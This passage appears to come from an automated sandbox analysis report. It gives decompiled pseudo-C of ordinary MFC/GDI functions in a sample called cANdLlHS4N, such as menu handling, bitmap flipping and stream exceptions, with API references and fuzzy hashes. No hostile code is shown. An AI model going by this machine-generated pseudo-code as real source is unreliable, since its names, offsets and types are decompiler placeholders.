      								_t98 = GetMenu( *(_t133 + 0x20));
      							}
      							_t118[1] = _t98;
      							if(_t98 != _t130) {
      								InvalidateRect( *(_t133 + 0x20), _t130, 1);
      								 *((intOrPtr*)(_t133->left + 0x70))(_t130);
      								_t40 = _t133 + 0x10c;
      								 *_t40 =  *(_t133 + 0x10c) & 0xfffffffe;
      								_t151 =  *_t40;
      							}
      							_t118[5] =  *(_t133 + 0x80);
      							 *(_t133 + 0x80) = _t130;
      							_t99 = E009A6CCC(_t133, _t151, 0x7915);
      							if( *_t118 != 0xe900) {
      								_t99 = GetDlgItem( *(_t133 + 0x20), 0xe900);
      								_a4 = _t99;
      							}
      							if(_a4 == 0) {
      								return _t99;
      							} else {
      								return SetWindowLongA(_a4, 0xfffffff4, 0xea21);
      							}
      						}
      						while(_t74 != _t130) {
      							_t130 = _t74[2];
      							_t119 =  *_t74;
      							_v12 =  *_t74;
      							if(_t130 == 0) {
      								goto L1;
      							}
      							_t104 = GetDlgCtrlID( *(_t130 + 0x20));
      							_t14 = _t104 - 0xe800; // -59392
      							_t119 = _t14;
      							_v16 = _t104;
      							if(_t14 <= 0x1f) {
      								_t16 = _t104 - 0xe800; // -59392
      								_v8 = 1 << _t16;
      								if( *((intOrPtr*)(_t130->left + 0x18c))() != 0) {
      									_a8 = _a8 | _v8;
      								}
      								_t119 = _t130;
      								if( *((intOrPtr*)(_t130->left + 0x194))() == 0 || _v16 != 0xe81f) {
      									_t119 = _t133;
      									E009A78B4(_t133, _t130, _t118[2] & _v8, 1);
      								}
      							}
      							_t130 = 0;
      							if(_v12 != 0) {
      								_t74 = _v12;
      								continue;
      							} else {
      								goto L18;
      							}
      						}
      					}
      				}
      				L1:
      				E009B8782(_t119);
      				goto L2;
      			}

      APIs
      • GetDlgCtrlID.USER32 ref: 009A7F36
      • GetDlgItem.USER32 ref: 009A7FC0
      • ShowWindow.USER32(00000000,00000000), ref: 009A7FCB
      • GetMenu.USER32(?), ref: 009A7FDD
      • InvalidateRect.USER32(?,00000000,00000001), ref: 009A7FF8
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      • GetDlgItem.USER32 ref: 009A8035
      • SetWindowLongA.USER32 ref: 009A8052
      • GetDlgItem.USER32 ref: 009A806B
      • GetDlgItem.USER32 ref: 009A8081
      • SetWindowLongA.USER32 ref: 009A8093
      • SetWindowLongA.USER32 ref: 009A809F
      • InvalidateRect.USER32(00000001,00000000,00000001), ref: 009A80B2
      • SetMenu.USER32(00000000,00000000), ref: 009A80C9
      • GetDlgItem.USER32 ref: 009A8110
      • ShowWindow.USER32(?,00000005), ref: 009A811E
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ItemWindow$Long$InvalidateMenuRectShow$CtrlException@8Throw
      • String ID:
      • API String ID: 3179827820-0
      • Opcode ID: 009bd2c3fd3cb32e6873dcd315b152d06d367894477539c448e7fd664b3a5573
      • Instruction ID: 5fe4c1cc4ac9a778caf1e0ee116d9ed572bf7b9f9e6b19498e06edf60a28c6fe
      • Opcode Fuzzy Hash: 009bd2c3fd3cb32e6873dcd315b152d06d367894477539c448e7fd664b3a5573
      • Instruction Fuzzy Hash: C9814330600604EFCB21DF64CC89BAABBF5FF49704F14896AF95A9B261DB359941CF90
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 95%
      			E00A382C6(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
      				void* _t98;
      				signed int _t100;
      				int _t105;
      				void* _t113;
      				int _t123;
      				void* _t130;
      				int _t135;
      				int _t136;
      				void*** _t143;
      				signed int _t144;
      				signed int _t146;
      				int _t147;
      				void* _t150;
      				void* _t153;
      
      				_t134 = __ebx;
      				_push(0xa8);
      				E00AAD29B(0xace3fd, __ebx, __edi, __esi);
      				_t149 =  *(_t153 + 8);
      				_t98 =  *_t149;
      				_t146 =  *(_t153 + 0xc);
      				 *(_t153 - 0x84) = _t146;
      				if(_t98 != 0) {
      					_t134 = GetObjectA;
      					if(GetObjectA(_t98, 0x18, _t153 - 0xb4) != 0) {
      						_t100 =  *(_t153 - 0xb0);
      						 *(_t153 - 0x7c) = _t100;
      						asm("cdq");
      						_t144 = _t100 % _t146;
      						 *(_t153 - 0x80) =  *(_t153 - 0xac);
      						 *(_t153 - 0x68) = _t100 / _t146;
      						if( *((short*)(_t153 - 0xa2)) != 0x20) {
      							E009BA639(_t153 - 0x98);
      							_t146 = 0;
      							 *(_t153 - 4) = 0;
      							E009BAD44(GetObjectA, _t153 - 0x98, _t144, 0, CreateCompatibleDC(0));
      							_t150 =  *_t149;
      							if(_t150 == 0) {
      								 *(_t153 - 0x74) = 0;
      							} else {
      								 *(_t153 - 0x74) = SelectObject( *(_t153 - 0x94), _t150);
      							}
      							if( *(_t153 - 0x74) != _t146) {
      								_t105 =  *(_t153 - 0x68);
      								if(_t105 <= _t146) {
      									L35:
      									SelectObject( *(_t153 - 0x94),  *(_t153 - 0x74));
      									_t149 = 1;
      									L25:
      									 *(_t153 - 4) =  *(_t153 - 4) | 0xffffffff;
      									E009BADC5(_t153 - 0x98);
      									L2:
      									return E00AAD31E(_t134, _t146, _t149);
      								}
      								_t146 = SetPixel;
      								_t135 = 0;
      								 *(_t153 - 0x78) = 0;
      								 *(_t153 - 0x7c) = _t105;
      								do {
      									 *(_t153 - 0x68) =  *(_t153 - 0x68) & 0x00000000;
      									if( *(_t153 - 0x80) <= 0) {
      										goto L34;
      									}
      									asm("cdq");
      									 *(_t153 - 0x70) =  *(_t153 - 0x84) - _t144;
      									 *(_t153 - 0x70) =  *(_t153 - 0x70) >> 1;
      									do {
      										 *(_t153 - 0x6c) = _t135;
      										_t136 = _t135 +  *(_t153 - 0x84) - 1;
      										_t113 =  *(_t153 - 0x70);
      										if(_t113 <= 0) {
      											goto L33;
      										}
      										 *(_t153 - 0x88) = _t113;
      										do {
      											 *(_t153 - 0x9c) = GetPixel( *(_t153 - 0x94),  *(_t153 - 0x6c),  *(_t153 - 0x68));
      											SetPixel( *(_t153 - 0x94),  *(_t153 - 0x6c),  *(_t153 - 0x68), GetPixel( *(_t153 - 0x94), _t136,  *(_t153 - 0x68)));
      											SetPixel( *(_t153 - 0x94), _t136,  *(_t153 - 0x68),  *(_t153 - 0x9c));
      											 *(_t153 - 0x6c) =  *(_t153 - 0x6c) + 1;
      											_t136 = _t136 - 1;
      											_t83 = _t153 - 0x88;
      											 *_t83 =  *(_t153 - 0x88) - 1;
      										} while ( *_t83 != 0);
      										L33:
      										 *(_t153 - 0x68) =  *(_t153 - 0x68) + 1;
      										_t135 =  *(_t153 - 0x78);
      									} while ( *(_t153 - 0x68) <  *(_t153 - 0x80));
      									L34:
      									_t135 = _t135 +  *(_t153 - 0x84);
      									_t91 = _t153 - 0x7c;
      									 *_t91 =  *(_t153 - 0x7c) - 1;
      									 *(_t153 - 0x78) = _t135;
      								} while ( *_t91 != 0);
      								goto L35;
      							}
      							_t149 = 0;
      							goto L25;
      						}
      						if(GetObjectA( *_t149, 0x54, _t153 - 0x64) == 0 ||  *((short*)(_t153 - 0x52)) != 0x20) {
      							goto L4;
      						} else {
      							_t123 =  *(_t153 - 0x50);
      							if(_t123 == 0) {
      								goto L4;
      							}
      							if( *(_t153 - 0x68) <= 0) {
      								goto L1;
      							}
      							 *(_t153 - 0x6c) = _t123;
      							_t134 = _t146 << 2;
      							do {
      								if( *(_t153 - 0x80) <= 0) {
      									goto L18;
      								}
      								_t147 =  *(_t153 - 0x6c);
      								asm("cdq");
      								 *(_t153 - 0x70) = _t146 - _t144;
      								 *(_t153 - 0x70) =  *(_t153 - 0x70) >> 1;
      								 *(_t153 - 0x78) =  *(_t153 - 0x80);
      								do {
      									_t130 =  *(_t153 - 0x70);
      									_t144 = _t147;
      									_t143 = _t147 + _t134 - 4;
      									if(_t130 <= 0) {
      										goto L16;
      									}
      									 *(_t153 - 0x74) = _t130;
      									do {
      										_t149 =  *_t144;
      										 *_t144 =  *_t143;
      										 *_t143 =  *_t144;
      										_t144 = _t144 + 4;
      										_t143 = _t143 - 4;
      										_t33 = _t153 - 0x74;
      										 *_t33 =  *(_t153 - 0x74) - 1;
      									} while ( *_t33 != 0);
      									L16:
      									_t147 = _t147 + ( *(_t153 - 0x7c) << 2);
      									_t36 = _t153 - 0x78;
      									 *_t36 =  *(_t153 - 0x78) - 1;
      								} while ( *_t36 != 0);
      								_t146 =  *(_t153 - 0x84);
      								L18:
      								 *(_t153 - 0x6c) =  *(_t153 - 0x6c) + _t134;
      								_t41 = _t153 - 0x68;
      								 *_t41 =  *(_t153 - 0x68) - 1;
      							} while ( *_t41 != 0);
      							goto L1;
      						}
      					}
      					L4:
      					goto L2;
      				}
      				L1:
      				goto L2;
      			}

      APIs
      • __EH_prolog3_GS.LIBCMT ref: 00A382D0
      • GetObjectA.GDI32(00000000,00000018,?), ref: 00A38302
      • GetObjectA.GDI32(?,00000054,?), ref: 00A3833A
      • CreateCompatibleDC.GDI32(00000000), ref: 00A383D0
      • SelectObject.GDI32(?,?), ref: 00A383EF
      • GetPixel.GDI32(?,?,00000000), ref: 00A3847C
      • GetPixel.GDI32(?,?,00000000), ref: 00A3848E
      • SetPixel.GDI32(?,?,00000000,00000000), ref: 00A3849D
      • SetPixel.GDI32(?,?,00000000,?), ref: 00A384AF
      • SelectObject.GDI32(?,?), ref: 00A384E6
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ObjectPixel$Select$CompatibleCreateH_prolog3_
      • String ID: $
      • API String ID: 1266819874-227171996
      • Opcode ID: 0160f1b5adf55c16724e6ca93b95ff16685b0334999189033ded1e95d084b8ab
      • Instruction ID: e9e180dbd9714a755c25420e28feb43025fa5b1ed72b63d04d568634f90ef762
      • Opcode Fuzzy Hash: 0160f1b5adf55c16724e6ca93b95ff16685b0334999189033ded1e95d084b8ab
      • Instruction Fuzzy Hash: 9D71ED71D00329CBDF21DFA8CC84AADBBB5FF18314F2041AAE519AB252DB359985DF40
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 97%
      			E00A535DB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				void* _t53;
      				void* _t65;
      				signed int* _t73;
      				unsigned int _t87;
      				signed int _t91;
      				signed int _t93;
      				void* _t94;
      				signed int _t100;
      				void* _t103;
      				signed int _t109;
      				void* _t110;
      
      				_t94 = __edx;
      				_push(0x4c);
      				E00AAD232(0xacf9dc, __ebx, __edi, __esi);
      				if( *(_t110 + 8) != 0) {
      					if(GetObjectA( *(_t110 + 8), 0x18, _t110 - 0x58) == 0 ||  *((intOrPtr*)(_t110 - 0x44)) == 0) {
      						goto L1;
      					} else {
      						 *(_t110 - 0x1c) =  *(_t110 - 0x50);
      						 *(_t110 - 0x10) = 0;
      						 *(_t110 - 0x20) =  *(_t110 - 0x54);
      						 *(_t110 - 0x14) = E00A52BF6(_t110 - 0x20, _t110 - 0x10);
      						 *(_t110 - 0x18) = E00AAFF44(_t94,  *(_t110 - 0x50));
      						if( *(_t110 - 0x14) != 0) {
      							_t61 =  *(_t110 - 0x54) *  *(_t110 - 0x18);
      							 *(_t110 - 0x1c) =  *(_t110 - 0x54) *  *(_t110 - 0x18);
      							if( *((short*)(_t110 - 0x46)) != 0x20) {
      								E009BA639(_t110 - 0x40);
      								 *(_t110 - 4) = 0;
      								E009BAD44(0, _t110 - 0x40, _t94, CreateCompatibleDC, CreateCompatibleDC(0));
      								_t65 = SelectObject( *(_t110 - 0x3c),  *(_t110 + 8));
      								 *(_t110 + 8) = _t65;
      								if(_t65 != 0) {
      									E009BA639(_t110 - 0x30);
      									 *(_t110 - 4) = 1;
      									E009BAD44(0, _t110 - 0x30, _t94, CreateCompatibleDC, CreateCompatibleDC(0));
      									_t103 = SelectObject( *(_t110 - 0x2c),  *(_t110 - 0x14));
      									BitBlt( *(_t110 - 0x2c), 0, 0,  *(_t110 - 0x54),  *(_t110 - 0x18),  *(_t110 - 0x3c), 0, 0, "singapore");
      									if(_t103 != 0) {
      										SelectObject( *(_t110 - 0x2c), _t103);
      									}
      									SelectObject( *(_t110 - 0x3c),  *(_t110 + 8));
      									_t87 =  *(_t110 + 0xc);
      									_t73 =  *(_t110 - 0x10);
      									if(_t87 != 0xffffffff) {
      										_t109 =  *(_t110 - 0x1c);
      										_t100 = (_t87 >> 0x00000008 & 0x000000ff | (_t87 & 0x000000ff) << 0x00000008) << 0x00000008 | _t87 >> 0x00000010 & 0x000000ff;
      										if(_t109 > 0) {
      											do {
      												_t91 =  *_t73;
      												if(_t91 == _t100) {
      													 *_t73 = 0;
      												} else {
      													 *_t73 = _t91 | 0xff000000;
      												}
      												_t73 =  &(_t73[1]);
      												_t109 = _t109 - 1;
      											} while (_t109 != 0);
      										}
      									} else {
      										_t93 =  *(_t110 - 0x1c);
      										if(_t93 > 0) {
      											do {
      												 *_t73 =  *_t73 | 0xff000000;
      												_t73 =  &(_t73[1]);
      												_t93 = _t93 - 1;
      											} while (_t93 != 0);
      										}
      									}
      									 *(_t110 - 4) = 0;
      									E009BADC5(_t110 - 0x30);
      								}
      								 *(_t110 - 4) =  *(_t110 - 4) | 0xffffffff;
      								E009BADC5(_t110 - 0x40);
      							} else {
      								E00AAB080( *(_t110 - 0x10),  *((intOrPtr*)(_t110 - 0x44)), _t61 << 2);
      							}
      						}
      						_t53 =  *(_t110 - 0x14);
      					}
      				} else {
      					L1:
      					_t53 = 0;
      				}
      				return E00AAD30A(_t53);
      			}

      APIs
      • __EH_prolog3.LIBCMT ref: 00A535E2
      • GetObjectA.GDI32(00000018,00000018,00AE8844), ref: 00A535FE
      • _memmove.LIBCMT ref: 00A5365C
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: H_prolog3Object_memmove
      • String ID: $singapore
      • API String ID: 107514201-3479711124
      • Opcode ID: f6af52ed119e8ab337006a62d012282acf45bc9cdee5831075d89f8ea0ba5335
      • Instruction ID: 4429ef188a4f460caa69f720fbf2f56708a54388ae6ce23885b1facf54725a27
      • Opcode Fuzzy Hash: f6af52ed119e8ab337006a62d012282acf45bc9cdee5831075d89f8ea0ba5335
      • Instruction Fuzzy Hash: 88412AB2C10119AFCF15DFA4DD819EEBBB5FF88351B104029E912B72A1DB315E49DB60
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E009A18A0(void* __ecx, signed int _a4, char* _a8) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				char _v24;
      				signed int _t31;
      				intOrPtr _t32;
      				intOrPtr _t35;
      				intOrPtr _t39;
      				signed char _t46;
      
      				_t31 = _a4 & 0x00000017;
      				 *(__ecx + 0xc) = _t31;
      				_t46 =  *(__ecx + 0x10) & _t31;
      				if(_t46 != 0) {
      					if(_a8 != 0) {
      						E00AAB8C9(0, 0);
      					}
      					if((_t46 & 0x00000004) != 0) {
      						_t39 = E00AC5F23();
      						_a8 = "ios_base::badbit set";
      						E00AAAF07( &_v24,  &_a8);
      						_t46 =  &_v24;
      						_v12 = 1;
      						_v8 = _t39;
      						_v24 = 0xad6e70;
      						E00AAB8C9(_t46, 0xb0b024);
      					}
      					if((_t46 & 0x00000002) != 0) {
      						_t35 = E00AC5F23();
      						_a8 = "ios_base::failbit set";
      						E00AAAF07( &_v24,  &_a8);
      						_v12 = 1;
      						_v8 = _t35;
      						_v24 = 0xad6e70;
      						E00AAB8C9( &_v24, 0xb0b024);
      					}
      					_t32 = E00AC5F23();
      					_a8 = "ios_base::eofbit set";
      					E00AAAF07( &_v24,  &_a8);
      					_v12 = 1;
      					_v8 = _t32;
      					_v24 = 0xad6e70;
      					return E00AAB8C9( &_v24, 0xb0b024);
      				}
      				return _t31;
      			}

      APIs
      • __CxxThrowException@8.LIBCMT ref: 009A18C4
        • Part of subcall function 00AAB8C9: RaiseException.KERNEL32(?,?,009A1977,?,?,?,?,?,009A1977,?,00B0B024,00000000), ref: 00AAB90B
      • std::exception::exception.LIBCMT ref: 009A18E8
      • __CxxThrowException@8.LIBCMT ref: 009A1903
      • std::exception::exception.LIBCMT ref: 009A1922
      • __CxxThrowException@8.LIBCMT ref: 009A193D
      • std::exception::exception.LIBCMT ref: 009A1957
      • __CxxThrowException@8.LIBCMT ref: 009A1972
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Exception@8Throw$std::exception::exception$ExceptionRaise
      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
      • API String ID: 4237746311-1866435925
      • Opcode ID: d504947b52448c5b6d714515f7a779dd1c719bdf3ed7c498accba3c788d4a267
      • Instruction ID: 6714e3ea68f22bb29b113168726d6a9ef4db9f73443736e47a2e54347ee1ac41
      • Opcode Fuzzy Hash: d504947b52448c5b6d714515f7a779dd1c719bdf3ed7c498accba3c788d4a267
      • Instruction Fuzzy Hash: DB2148F5800208ABCB05DF98C541BEEB7F86F55310F14804EF55567281EB745B48CBA2
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 94%
      			E009B4DF8(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				signed int _t54;
      				void* _t58;
      				signed int _t59;
      				signed int _t63;
      				signed int _t71;
      				signed int _t84;
      				void* _t94;
      				struct HINSTANCE__* _t96;
      				signed int _t97;
      				void* _t98;
      				signed int _t100;
      				void* _t101;
      				void* _t102;
      
      				_t102 = __eflags;
      				_t94 = __edx;
      				_push(0x24);
      				E00AAD265(0xac841f, __ebx, __edi, __esi);
      				_t100 = __ecx;
      				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
      				 *(_t101 - 0x1c) =  *(__ecx + 0x80);
      				 *(_t101 - 0x18) =  *(__ecx + 0x7c);
      				_t54 = E009BD77F(__ebx, __edi, __ecx, _t102);
      				_t96 =  *(_t54 + 0xc);
      				_t84 = 0;
      				_t103 =  *(_t100 + 0x78);
      				if( *(_t100 + 0x78) != 0) {
      					_t96 =  *(E009BD77F(0, _t96, _t100, _t103) + 0xc);
      					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x78), 5));
      					 *(_t101 - 0x18) = _t54;
      				}
      				if( *(_t101 - 0x18) != _t84) {
      					_t54 = LockResource( *(_t101 - 0x18));
      					 *(_t101 - 0x1c) = _t54;
      				}
      				if( *(_t101 - 0x1c) != _t84) {
      					_t86 = _t100;
      					 *(_t101 - 0x14) = E009B4942(_t84, _t100, __eflags);
      					E009AC9C6(_t84, _t96, __eflags);
      					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
      					 *(_t101 - 0x2c) = _t84;
      					 *(_t101 - 0x24) = _t84;
      					__eflags =  *(_t101 - 0x14) - _t84;
      					if(__eflags != 0) {
      						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
      						if(__eflags != 0) {
      							__eflags = IsWindowEnabled( *(_t101 - 0x14));
      							if(__eflags != 0) {
      								EnableWindow( *(_t101 - 0x14), 0);
      								 *(_t101 - 0x2c) = 1;
      								_t84 = E009A6B56();
      								 *(_t101 - 0x24) = _t84;
      								__eflags = _t84;
      								if(__eflags != 0) {
      									_t86 = _t84;
      									__eflags =  *((intOrPtr*)( *_t84 + 0x14c))();
      									if(__eflags != 0) {
      										_t86 = _t84;
      										__eflags = E009B0BF8(_t84);
      										if(__eflags != 0) {
      											_t86 = _t84;
      											E009B0C13(_t84, 0);
      											 *(_t101 - 0x28) = 1;
      										}
      									}
      								}
      							}
      						}
      					}
      					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
      					E009AED3F(_t84, __eflags, _t100);
      					_t58 = E009AC90B(_t84, _t86, _t94,  *(_t101 - 0x14));
      					_push(_t96);
      					_push(_t58);
      					_push( *(_t101 - 0x1c));
      					_t59 = E009B4C39(_t84, _t100, _t94, _t96, _t100, __eflags);
      					_t97 = 0;
      					__eflags = _t59;
      					if(_t59 != 0) {
      						__eflags =  *(_t100 + 0x58) & 0x00000010;
      						if(( *(_t100 + 0x58) & 0x00000010) != 0) {
      							_t98 = 4;
      							_t71 = E009B0A7A(_t100);
      							__eflags = _t71 & 0x00000100;
      							if((_t71 & 0x00000100) != 0) {
      								_t98 = 5;
      							}
      							E009AC4CD(_t100, _t94, _t98);
      							_t97 = 0;
      							__eflags = 0;
      						}
      						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
      						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
      							E009B0DD3(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
      						}
      					}
      					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
      					__eflags =  *(_t101 - 0x28) - _t97;
      					if( *(_t101 - 0x28) != _t97) {
      						E009B0C13(_t84, 1);
      					}
      					__eflags =  *(_t101 - 0x2c) - _t97;
      					if( *(_t101 - 0x2c) != _t97) {
      						EnableWindow( *(_t101 - 0x14), 1);
      					}
      					__eflags =  *(_t101 - 0x14) - _t97;
      					if(__eflags != 0) {
      						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
      						if(__eflags == 0) {
      							SetActiveWindow( *(_t101 - 0x14));
      						}
      					}
      					 *((intOrPtr*)( *_t100 + 0x60))();
      					E009B4984(_t84, _t100, _t94, _t97, _t100, __eflags);
      					__eflags =  *(_t100 + 0x78) - _t97;
      					if( *(_t100 + 0x78) != _t97) {
      						FreeResource( *(_t101 - 0x18));
      					}
      					_t63 =  *(_t100 + 0x60);
      					goto L31;
      				} else {
      					_t63 = _t54 | 0xffffffff;
      					L31:
      					return E00AAD30A(_t63);
      				}
      			}

      APIs
      • __EH_prolog3_catch.LIBCMT ref: 009B4DFF
      • FindResourceA.KERNEL32(?,?,00000005), ref: 009B4E35
      • LoadResource.KERNEL32(?,00000000), ref: 009B4E3D
        • Part of subcall function 009AC9C6: UnhookWindowsHookEx.USER32(?), ref: 009AC9F6
      • LockResource.KERNEL32(?,00000024,009A4695,3A0E8B0C), ref: 009B4E4E
      • GetDesktopWindow.USER32 ref: 009B4E81
      • IsWindowEnabled.USER32(?), ref: 009B4E8F
      • EnableWindow.USER32(?,00000000), ref: 009B4E9E
        • Part of subcall function 009B0BF8: IsWindowEnabled.USER32(?), ref: 009B0C01
        • Part of subcall function 009B0C13: EnableWindow.USER32(?,009A4695), ref: 009B0C24
      • EnableWindow.USER32(?,00000001), ref: 009B4F83
      • GetActiveWindow.USER32 ref: 009B4F8E
      • SetActiveWindow.USER32(?,?,00000024,009A4695,3A0E8B0C), ref: 009B4F9C
      • FreeResource.KERNEL32(?,?,00000024,009A4695,3A0E8B0C), ref: 009B4FB8
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
      • String ID:
      • API String ID: 964565984-0
      • Opcode ID: c2446affbe3b59eb66e042ce004fb0fae04bd81c2b82656c4c99320c029f5127
      • Instruction ID: efb347edfd171d33ba27d753a95c4865980c191c1890e1164994b5e4b449e157
      • Opcode Fuzzy Hash: c2446affbe3b59eb66e042ce004fb0fae04bd81c2b82656c4c99320c029f5127
      • Instruction Fuzzy Hash: 17519030A007098FCB21AFA5CA857FEBBB5BF88721F20042DE512A71A2CB748941DB51
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 85%
      			E00A3991B(void* __ecx, unsigned int __edx, intOrPtr _a4) {
      				signed int _v8;
      				char _v1032;
      				signed int _v1036;
      				unsigned int* _v1040;
      				signed int _v1044;
      				signed int _v1048;
      				signed int _v1052;
      				intOrPtr _v1056;
      				char _v1060;
      				signed int _v1064;
      				signed int _v1068;
      				signed int _v1072;
      				signed int _v1076;
      				signed int _v1080;
      				unsigned int* _v1088;
      				intOrPtr _v1096;
      				char _v1104;
      				void* _v1116;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				signed int _t116;
      				signed int _t118;
      				signed int _t126;
      				signed int _t133;
      				signed int _t135;
      				signed int _t144;
      				signed int _t151;
      				intOrPtr _t160;
      				void* _t161;
      				intOrPtr _t162;
      				signed int _t165;
      				unsigned int _t181;
      				signed int _t189;
      				void* _t190;
      				unsigned int _t194;
      				unsigned int* _t195;
      				signed int _t196;
      				void* _t198;
      				void* _t199;
      				signed int _t200;
      				intOrPtr _t201;
      				signed int _t202;
      				signed int _t203;
      				signed int _t204;
      				signed int _t206;
      				signed int _t208;
      				signed int _t209;
      
      				_t184 = __edx;
      				_t206 = _t208;
      				_t209 = _t208 - 0x44c;
      				_t116 =  *0xd0c910; // 0x3a0e8b0c
      				_v8 = _t116 ^ _t206;
      				_t160 = _a4;
      				_t198 = __ecx;
      				_v1056 = _t160;
      				_t118 = E00A36C70(_t160);
      				_v1040 = _v1040 & 0x00000000;
      				_t189 = _t118;
      				_t165 = 0x20;
      				_v1064 = _t189;
      				_v1052 = _t165;
      				_v1044 = 0x22009;
      				if((_t189 & 0x00020000) != 0) {
      					_v1052 = _t118 >> 0x00000008 & 0x000000ff;
      					_v1044 = _t189;
      				}
      				_t214 = _t189 & 0x00040000;
      				if((_t189 & 0x00040000) != 0) {
